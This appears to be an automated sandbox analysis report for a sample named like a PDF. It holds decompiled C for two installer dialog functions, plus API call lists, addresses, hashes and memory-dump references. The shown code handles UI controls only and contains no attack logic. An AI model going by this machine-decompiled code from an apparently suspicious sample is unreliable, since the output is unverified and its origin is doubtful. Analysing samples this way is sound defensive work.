                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                            • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                            • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                            • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                            0x00405038
                                                                                            0x00405051
                                                                                            0x00405056
                                                                                            0x0040505e
                                                                                            0x00405064
                                                                                            0x0040507a
                                                                                            0x0040507d
                                                                                            0x004052a8
                                                                                            0x004052af
                                                                                            0x004052c3
                                                                                            0x004052b1
                                                                                            0x004052b3
                                                                                            0x004052b6
                                                                                            0x004052b7
                                                                                            0x004052be
                                                                                            0x004052be
                                                                                            0x004052cf
                                                                                            0x004052dd
                                                                                            0x004052e0
                                                                                            0x004052f6
                                                                                            0x0040536b
                                                                                            0x0040536e
                                                                                            0x00405370
                                                                                            0x0040537a
                                                                                            0x00405388
                                                                                            0x00405388
                                                                                            0x0040538a
                                                                                            0x00405394
                                                                                            0x0040539a
                                                                                            0x0040539d
                                                                                            0x004053a0
                                                                                            0x004053bb
                                                                                            0x004053a2
                                                                                            0x004053ac
                                                                                            0x004053ac
                                                                                            0x004053a0
                                                                                            0x00405394
                                                                                            0x00000000
                                                                                            0x0040536e
                                                                                            0x004052fb
                                                                                            0x00405306
                                                                                            0x0040530b
                                                                                            0x00405312
                                                                                            0x00405317
                                                                                            0x0040531b
                                                                                            0x00405326
                                                                                            0x00405326
                                                                                            0x0040532a
                                                                                            0x0040532e
                                                                                            0x00405332
                                                                                            0x00405345
                                                                                            0x00405334
                                                                                            0x00405334
                                                                                            0x0040533b
                                                                                            0x00405341
                                                                                            0x0040533d
                                                                                            0x0040533d
                                                                                            0x0040533d
                                                                                            0x0040533b
                                                                                            0x00405349
                                                                                            0x0040534b
                                                                                            0x0040535e
                                                                                            0x00405361
                                                                                            0x00405364
                                                                                            0x00405364
                                                                                            0x0040532e
                                                                                            0x00000000
                                                                                            0x0040531b
                                                                                            0x004052fd
                                                                                            0x00405304
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004053be
                                                                                            0x004053be
                                                                                            0x004053c5
                                                                                            0x00405436
                                                                                            0x0040543e
                                                                                            0x00405446
                                                                                            0x00405446
                                                                                            0x0040544f
                                                                                            0x00405451
                                                                                            0x00405458
                                                                                            0x0040545b
                                                                                            0x0040545b
                                                                                            0x00405461
                                                                                            0x00405468
                                                                                            0x0040546b
                                                                                            0x0040546b
                                                                                            0x00405471
                                                                                            0x00405477
                                                                                            0x0040547d
                                                                                            0x0040547d
                                                                                            0x0040548a
                                                                                            0x004055eb
                                                                                            0x004055f2
                                                                                            0x0040560f
                                                                                            0x00405615
                                                                                            0x00405627
                                                                                            0x00405627
                                                                                            0x00000000
                                                                                            0x00405490
                                                                                            0x00405492
                                                                                            0x00405497
                                                                                            0x0040549c
                                                                                            0x004054a1
                                                                                            0x004054a3
                                                                                            0x004054a3
                                                                                            0x004054a4
                                                                                            0x004054a5
                                                                                            0x004054a7
                                                                                            0x004054a7
                                                                                            0x004054af
                                                                                            0x004054f0
                                                                                            0x004054f2
                                                                                            0x00405502
                                                                                            0x00405505
                                                                                            0x0040550a
                                                                                            0x00405511
                                                                                            0x00405514
                                                                                            0x004055b6
                                                                                            0x004055bf
                                                                                            0x004055c7
                                                                                            0x004055c7
                                                                                            0x004055d5
                                                                                            0x004055e6
                                                                                            0x004055e6
                                                                                            0x00000000
                                                                                            0x004055d5
                                                                                            0x0040551a
                                                                                            0x0040551d
                                                                                            0x00405523
                                                                                            0x00405528
                                                                                            0x0040552a
                                                                                            0x0040552c
                                                                                            0x00405532
                                                                                            0x00405539
                                                                                            0x0040553e
                                                                                            0x00405545
                                                                                            0x00405548
                                                                                            0x00405548
                                                                                            0x0040554f
                                                                                            0x0040555b
                                                                                            0x0040555f
                                                                                            0x00405561
                                                                                            0x00405561
                                                                                            0x00405551
                                                                                            0x00405553
                                                                                            0x00405553
                                                                                            0x00405581
                                                                                            0x0040558d
                                                                                            0x0040559c
                                                                                            0x0040559c
                                                                                            0x0040559e
                                                                                            0x004055a1
                                                                                            0x004055aa
                                                                                            0x00000000
                                                                                            0x004054b1
                                                                                            0x004054bc
                                                                                            0x004054bf
                                                                                            0x004054c4
                                                                                            0x004054c6
                                                                                            0x004054ca
                                                                                            0x004054da
                                                                                            0x004054e4
                                                                                            0x004054e6
                                                                                            0x004054e9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004054cc
                                                                                            0x004054cc
                                                                                            0x004054d2
                                                                                            0x004054d4
                                                                                            0x004054d4
                                                                                            0x004054d5
                                                                                            0x004054d6
                                                                                            0x00000000
                                                                                            0x004054cc
                                                                                            0x004054af
                                                                                            0x0040548a
                                                                                            0x004053cd
                                                                                            0x00000000
                                                                                            0x004053e3
                                                                                            0x004053ed
                                                                                            0x004053f2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405404
                                                                                            0x00405409
                                                                                            0x00405415
                                                                                            0x00405415
                                                                                            0x00405417
                                                                                            0x00405426
                                                                                            0x00405428
                                                                                            0x0040542c
                                                                                            0x0040542f
                                                                                            0x00000000
                                                                                            0x0040542f
                                                                                            0x004053cd
                                                                                            0x00405083
                                                                                            0x00405088
                                                                                            0x00405091
                                                                                            0x00405098
                                                                                            0x004050aa
                                                                                            0x004050b5
                                                                                            0x004050bb
                                                                                            0x004050c9
                                                                                            0x004050dd
                                                                                            0x004050e2
                                                                                            0x004050ef
                                                                                            0x004050f4
                                                                                            0x0040510a
                                                                                            0x0040511b
                                                                                            0x00405128
                                                                                            0x00405128
                                                                                            0x0040512b
                                                                                            0x00405131
                                                                                            0x00405133
                                                                                            0x00405136
                                                                                            0x0040513b
                                                                                            0x00405140
                                                                                            0x00405142
                                                                                            0x00405142
                                                                                            0x00405162
                                                                                            0x00405162
                                                                                            0x00405164
                                                                                            0x00405165
                                                                                            0x0040516a
                                                                                            0x00405170
                                                                                            0x00405174
                                                                                            0x00405179
                                                                                            0x00405181
                                                                                            0x00405185
                                                                                            0x0040518a
                                                                                            0x0040518f
                                                                                            0x00405197
                                                                                            0x0040519a
                                                                                            0x0040526a
                                                                                            0x0040527d
                                                                                            0x00000000
                                                                                            0x004051a0
                                                                                            0x004051a3
                                                                                            0x004051a6
                                                                                            0x004051a9
                                                                                            0x004051a9
                                                                                            0x004051af
                                                                                            0x004051b8
                                                                                            0x004051bb
                                                                                            0x004051bf
                                                                                            0x004051c2
                                                                                            0x004051c5
                                                                                            0x004051ce
                                                                                            0x004051d7
                                                                                            0x004051da
                                                                                            0x004051dd
                                                                                            0x004051e0
                                                                                            0x0040521e
                                                                                            0x00405249
                                                                                            0x00405220
                                                                                            0x0040522f
                                                                                            0x0040522f
                                                                                            0x004051e2
                                                                                            0x004051e5
                                                                                            0x004051f3
                                                                                            0x004051fd
                                                                                            0x00405205
                                                                                            0x0040520c
                                                                                            0x00405217
                                                                                            0x00405217
                                                                                            0x004051e0
                                                                                            0x0040524f
                                                                                            0x00405250
                                                                                            0x0040525c
                                                                                            0x0040525c
                                                                                            0x00405268
                                                                                            0x00405283
                                                                                            0x00405286
                                                                                            0x004052a3
                                                                                            0x00000000
                                                                                            0x00405288
                                                                                            0x0040528d
                                                                                            0x00405296
                                                                                            0x00405629
                                                                                            0x0040563b
                                                                                            0x0040563b
                                                                                            0x00405286
                                                                                            0x00000000
                                                                                            0x00405268
                                                                                            0x0040519a

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00405049
                                                                                            • GetDlgItem.USER32 ref: 00405054
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                            • LoadImageW.USER32 ref: 004050B5
                                                                                            • SetWindowLongW.USER32 ref: 004050CE
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                            • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                            • SetWindowLongW.USER32 ref: 0040527D
                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                            • GlobalFree.KERNEL32 ref: 0040546B
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                            • GetDlgItem.USER32 ref: 00405620
                                                                                            • ShowWindow.USER32(00000000), ref: 00405627
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 2564846305-813528018
                                                                                            • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                            • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 91%
                                                                                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                                                            0x00404795
                                                                                            0x004048c2
                                                                                            0x0040491f
                                                                                            0x00404923
                                                                                            0x004049f0
                                                                                            0x004049f2
                                                                                            0x004049f2
                                                                                            0x004049f8
                                                                                            0x004049f8
                                                                                            0x004049fb
                                                                                            0x00000000
                                                                                            0x00404a02
                                                                                            0x00404931
                                                                                            0x00404937
                                                                                            0x00404941
                                                                                            0x0040494c
                                                                                            0x0040494f
                                                                                            0x00404952
                                                                                            0x0040495d
                                                                                            0x00404960
                                                                                            0x00404967
                                                                                            0x00404974
                                                                                            0x00404985
                                                                                            0x0040498b
                                                                                            0x00404993
                                                                                            0x004049a1
                                                                                            0x004049a7
                                                                                            0x004049a7
                                                                                            0x00404967
                                                                                            0x004049b1
                                                                                            0x00000000
                                                                                            0x004049bc
                                                                                            0x004049c0
                                                                                            0x004049d0
                                                                                            0x004049d0
                                                                                            0x004049d6
                                                                                            0x004049e2
                                                                                            0x004049e2
                                                                                            0x00000000
                                                                                            0x004049e6
                                                                                            0x004049b1
                                                                                            0x004048cd
                                                                                            0x00000000
                                                                                            0x004048df
                                                                                            0x004048e4
                                                                                            0x004048ea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404913
                                                                                            0x00404915
                                                                                            0x0040491a
                                                                                            0x00000000
                                                                                            0x0040491a
                                                                                            0x004048cd
                                                                                            0x0040479b
                                                                                            0x0040479e
                                                                                            0x004047a3
                                                                                            0x004047b4
                                                                                            0x004047b4
                                                                                            0x004047bc
                                                                                            0x004047bf
                                                                                            0x004047c3
                                                                                            0x004047c6
                                                                                            0x004047ca
                                                                                            0x004047cd
                                                                                            0x004047d0
                                                                                            0x004047d3
                                                                                            0x004047da
                                                                                            0x004047dc
                                                                                            0x004047dc
                                                                                            0x004047e6
                                                                                            0x004047f3
                                                                                            0x004047fd
                                                                                            0x00404802
                                                                                            0x00404805
                                                                                            0x0040480a
                                                                                            0x00404821
                                                                                            0x00404828
                                                                                            0x0040483b
                                                                                            0x0040483e
                                                                                            0x00404852
                                                                                            0x00404859
                                                                                            0x0040485e
                                                                                            0x00404863
                                                                                            0x00404863
                                                                                            0x00404871
                                                                                            0x0040487f
                                                                                            0x00404891
                                                                                            0x00404896
                                                                                            0x004048a6
                                                                                            0x004048a8
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CheckDlgButton.USER32 ref: 00404821
                                                                                            • GetDlgItem.USER32 ref: 00404835
                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                            • GetSysColor.USER32(?), ref: 00404863
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                            • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                            • GetDlgItem.USER32 ref: 004048FF
                                                                                            • SendMessageW.USER32(00000000), ref: 00404906
                                                                                            • GetDlgItem.USER32 ref: 00404931
                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                            • SetCursor.USER32(00000000), ref: 00404985
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                            • SetCursor.USER32(00000000), ref: 004049A1
                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
